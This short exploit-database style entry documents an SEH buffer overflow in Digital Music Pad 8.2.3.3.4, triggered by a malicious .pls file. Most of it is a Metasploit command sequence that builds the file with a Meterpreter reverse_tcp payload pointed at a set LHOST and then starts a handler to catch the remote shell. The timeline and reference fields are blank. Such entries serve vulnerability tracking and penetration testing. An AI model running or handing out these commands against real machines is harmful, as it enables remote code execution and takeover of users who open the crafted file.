EDB-ID-15134 : Digital Music Pad SEH overflow

Timeline :

PoC provided by :

Reference(s) :

Affected version(s) :

Digital Music Pad 8.2.3.3.4

Tested on Windows XP SP3 with :

Digital Music Pad 8.2.3.3.4

Description :

This module exploits a buffer overflow in Digital Music Pad Version 8.2.3.3.4 When opening a malicious pls file with the Digital Music Pad, a remote attacker could overflow a buffer and execute arbitrary code.

Commands :

use exploit/windows/fileformat/digital_music_pad_pls
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j